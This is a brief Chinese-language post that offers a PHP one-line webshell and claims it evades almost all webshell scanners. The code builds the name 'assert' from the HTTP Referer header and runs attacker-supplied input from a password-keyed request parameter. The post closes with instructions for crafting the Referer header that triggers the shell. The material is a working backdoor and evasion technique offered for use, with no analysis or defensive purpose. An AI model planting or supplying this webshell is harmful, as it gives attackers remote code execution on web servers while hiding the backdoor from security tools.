一个免杀的PHP一句话木马

一个可以绕过当前市面上几乎所有Webshell查杀免杀PHP一句话木马脚本。

<?php
/**
 * Noticed: (PHP 5 >= 5.3.0, PHP 7)
 *
 */
$password = "uedbox.com";
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
?>

请求时,设置Referer头,后面以"ass****"结尾即可,比如:Referer: https://www.uedbox.com/ass.php